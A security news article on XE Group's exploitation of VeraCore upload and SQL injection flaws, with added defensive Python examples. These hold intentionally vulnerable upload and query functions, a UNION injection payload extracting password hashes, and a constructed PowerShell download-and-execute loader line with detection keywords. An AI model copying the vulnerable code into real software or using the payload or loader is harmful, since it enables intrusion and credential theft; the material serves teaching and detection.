Friday, May 9, 2025

XE Hacker Group Exploiting VeraCore 0-Days to Deploy Malware & Steal Credit Card Details


The XE Group, a sophisticated Vietnamese-origin cybercrime organization active since 2013, has escalated its operations by exploiting two zero-day vulnerabilities in VeraCore software, CVE-2024-57968 and CVE-2025-25181.

These vulnerabilities, identified in a joint investigation by Intezer and Solis Security, have been used to deploy malware, steal sensitive information, and maintain long-term access to compromised systems.

VeraCore is widely utilized by fulfillment companies and e-retailers for warehouse and order management, making it a lucrative target for supply chain attacks.


The group’s recent activities reflect a notable shift from their earlier focus on credit card skimming to more advanced techniques involving zero-day exploits.

This evolution underscores the growing sophistication of XE Group’s operations and their ability to adapt to emerging opportunities in the cybercrime landscape.

Upload Validation & SQL Injection Flaws

The two exploited vulnerabilities in VeraCore highlight critical security gaps:

  1. CVE-2024-57968 (Upload Validation Vulnerability): This flaw allowed attackers to bypass the file upload filter and place malicious webshells on targeted servers. The webshells gave the group an unauthorized foothold for data exfiltration and malware deployment.
  2. CVE-2025-25181 (SQL Injection Vulnerability): This weakness allowed arbitrary SQL statements to be executed against the application database, which the group used for credential theft and as a stepping stone for lateral movement within the network.
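The two flaw classes, as an added example that is not VeraCore code and not from the Intezer and Solis Security report: an upload filter of the kind that double extensions and case changes slip past, and a query built by string concatenation, each beside a hardened form. File names, paths, the `users` table and its rows are constructed for the illustration.

```python
"""Constructed illustration (not VeraCore code) of the two flaw classes:
an upload filter that can be bypassed, and SQL built from user input,
each beside a hardened form. Names and paths are hypothetical."""
import os
import secrets
import sqlite3
from typing import List, Optional, Tuple

# ---- 1. Upload validation -------------------------------------------------

SERVER_SCRIPT_EXT = {"asp", "aspx", "ashx", "asmx", "config"}

def naive_upload_allowed(filename: str) -> bool:
    """Vulnerable: a denylist checked against the first extension only, with
    no case folding. 'shell.jpg.aspx' and 'shell.AsPx' both pass the filter,
    and on a case-insensitive Windows filesystem both land as .aspx."""
    parts = filename.split(".")
    ext = parts[1] if len(parts) > 1 else ""
    return ext not in SERVER_SCRIPT_EXT

# Allowlisted types and the leading bytes the content must carry.
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".pdf": b"%PDF-"}

def safe_upload_path(filename: str, content: bytes, upload_dir: str) -> Optional[str]:
    """Hardened: drop any directory part, allowlist only the final extension,
    require the content to match the claimed type, and store under a random
    server-chosen name. Returns the path to write, or None to reject.
    upload_dir must also sit outside the web root (or have script execution
    disabled): the filter is one layer, not the whole defence."""
    base = os.path.basename(filename.replace("\\", "/"))
    if not base or "\x00" in base or ";" in base:   # null bytes and legacy ';' tricks
        return None
    ext = os.path.splitext(base)[1].lower()
    if ext not in MAGIC or not content.startswith(MAGIC[ext]):
        return None
    return os.path.join(upload_dir, secrets.token_hex(16) + ext)

# ---- 2. SQL injection -----------------------------------------------------

def seed_db() -> sqlite3.Connection:
    """In-memory stand-in for an application database (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pwhash TEXT, role TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [("alice", "hash-a", "admin"), ("bob", "hash-b", "user")])
    return con

def find_user_vulnerable(con: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """Vulnerable: the caller's string is spliced into the statement, so a
    quote in `name` rewrites the query. A UNION payload pulls the pwhash
    column out through a query that was only meant to return name and role."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return con.execute(sql).fetchall()

def find_user_safe(con: sqlite3.Connection, name: str) -> List[Tuple[str, str]]:
    """Hardened: the value travels as a bound parameter and is never parsed
    as SQL, so the same payloads simply match no row."""
    return con.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()

if __name__ == "__main__":
    print(naive_upload_allowed("shell.jpg.aspx"),
          safe_upload_path("shell.jpg.aspx", b"<%@ Page %>", "/srv/uploads"))
    con = seed_db()
    payload = "x' UNION SELECT name, pwhash FROM users--"
    print(find_user_vulnerable(con, payload))
    print(find_user_safe(con, payload))
```

The injection half uses sqlite3, which refuses stacked statements, so the payload shown reads other columns rather than running a second command; against a server that allows stacked queries the same concatenation bug is worse, not better. The random server-chosen name in `safe_upload_path` is what removes the attacker's control over the stored extension, and it only helps if the directory it writes to is never mapped to a script handler.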

These vulnerabilities were first exploited as early as 2020, when XE Group gained access to a VeraCore system through SQL injection and uploaded webshells.

Figure: execution of the shellcode, emulated with Speakeasy.

Remarkably, they reactivated these webshells in 2024, demonstrating their persistence and strategic patience.

From Credit Card Skimming to Advanced Cybercrime

Initially known for credit card skimming through supply chain attacks, XE Group has evolved into a more dangerous threat actor.

Their earlier campaigns involved injecting malicious JavaScript into payment platforms and deploying password-stealing malware.

However, since 2024, the group has shifted its focus to exploiting enterprise software vulnerabilities for information theft and supply chain disruptions.

The group’s customized ASPXSpy webshells, which require a unique base64-encoded string before an operator can use them, have been pivotal in maintaining long-term access to compromised systems.

According to Intezer, these webshells enable file system exploration, database manipulation, and network reconnaissance.

Additionally, XE Group employs obfuscated PowerShell scripts to load Remote Access Trojans (RATs), further enhancing their stealth and operational reach.
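Two of the artifacts just described leave traces a defender can search for without any group-specific indicator: a server-side script being served out of a directory that should only hold uploaded data, and a PowerShell loader hidden behind an encoded command line. The helpers below are an added example, not tooling from the Intezer report; the IIS log lines, the `/Upload/files/` path, the loader script and the `example.invalid` host are all constructed for the illustration.

```python
"""Added triage helpers (not from the Intezer report) for two artifacts the
article describes: a server-side script executed from an upload directory,
found in IIS W3C logs, and a PowerShell loader hidden behind -EncodedCommand.
All log lines, paths and the script below are constructed samples."""
import base64
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

SCRIPT_EXT = (".asp", ".aspx", ".ashx", ".asmx", ".soap")

# Constructed IIS log. IIS writes '+' for spaces inside fields, so a plain
# whitespace split is safe. /Upload/files/ is a hypothetical upload directory.
SAMPLE_IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2024-11-02 03:14:07 10.0.0.5 POST /Upload/UploadFile.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 95
2024-11-02 03:14:31 10.0.0.5 GET /Upload/files/x.aspx - 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 12
2024-11-02 03:14:45 10.0.0.5 GET /Default.aspx - 443 - 198.51.100.20 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 30
2024-11-02 03:15:02 10.0.0.5 POST /Upload/files/x.aspx cmd=1 443 - 203.0.113.9 Mozilla/5.0+(Windows+NT+10.0) 200 0 0 640
"""

def parse_iis(text: str) -> List[Dict[str, str]]:
    """Turn W3C-format IIS log text into dicts keyed by the #Fields names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows

def webshell_candidates(rows, upload_dirs) -> Dict[str, List[Tuple[str, str, str, str]]]:
    """Requests that execute a server-side script from a directory that
    should only ever hold uploaded data, grouped by client IP. A hit here
    is the first file to pull from disk and inspect for webshell code."""
    dirs = tuple(d.lower() for d in upload_dirs)
    hits = defaultdict(list)
    for r in rows:
        uri = r["cs-uri-stem"].lower()
        if uri.endswith(SCRIPT_EXT) and uri.startswith(dirs):
            hits[r["c-ip"]].append((r["date"] + " " + r["time"], r["cs-method"],
                                    r["cs-uri-stem"], r["sc-status"]))
    return dict(hits)

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
_FLAGS = "|".join("encodedcommand"[:i] for i in range(14, 0, -1))
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:" + _FLAGS + r")\s+(?P<b64>[A-Za-z0-9+/=]+)")
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "frombase64string", "-w hidden", "bypass")

def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script behind -EncodedCommand: base64 over UTF-16LE text."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group("b64"), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def loader_indicators(cmdline: str) -> List[str]:
    """Keyword hits over the visible command line plus its decoded payload."""
    decoded = decode_encoded_command(cmdline) or ""
    hay = (cmdline + " " + decoded).lower()
    return [s for s in SUSPICIOUS if s in hay]

# Constructed loader line in the shape the article describes (download-and-run).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/loader.txt')"
SAMPLE_CMDLINE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii"))

if __name__ == "__main__":
    for ip, reqs in webshell_candidates(parse_iis(SAMPLE_IIS_LOG), ["/Upload/files/"]).items():
        print(ip, reqs)
    print(decode_encoded_command(SAMPLE_CMDLINE), loader_indicators(SAMPLE_CMDLINE))
```

The log check deliberately keys on where a script runs from rather than on a file name or a hash, because a webshell that was dropped years earlier and reactivated, as in this case, will not match any current indicator list. The keyword list over the decoded PowerShell is a starting point for a hunt, not a verdict; the decoded text is what an analyst reads.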

The exploitation of zero-day vulnerabilities by XE Group highlights the critical need for proactive cybersecurity measures.

Organizations using VeraCore or similar software should immediately:

  • Apply the vendor patch where one exists (at the time of Intezer’s report a fix was available for CVE-2024-57968 but not for CVE-2025-25181) and, in the meantime, disable or restrict the affected upload functionality as advised by the vendor.
  • Audit web server logs and the web root for unexpected .aspx files, especially under upload directories, and review network traffic for indicators of compromise.
  • Implement multi-factor authentication (MFA) to strengthen access controls.
  • Monitor threat intelligence feeds for known XE Group tactics and indicators.

The persistence of XE Group’s activities spanning years emphasizes the importance of robust incident response protocols.

Their ability to exploit unpatched vulnerabilities and maintain long-term access poses a severe risk to global supply chains, particularly in the manufacturing and distribution sectors.

XE Group’s transition from credit card skimming to exploiting zero-day vulnerabilities marks a significant escalation in their cybercrime capabilities.

By targeting enterprise software like VeraCore, they have demonstrated adaptability and operational discipline, posing a formidable challenge to cybersecurity defenses worldwide.

The case serves as a stark reminder of the importance of addressing software vulnerabilities promptly and investing in advanced detection systems to mitigate emerging threats.


Aman Mishra
Aman Mishra is a Security and privacy Reporter covering various data breach, cyber crime, malware, & vulnerability.
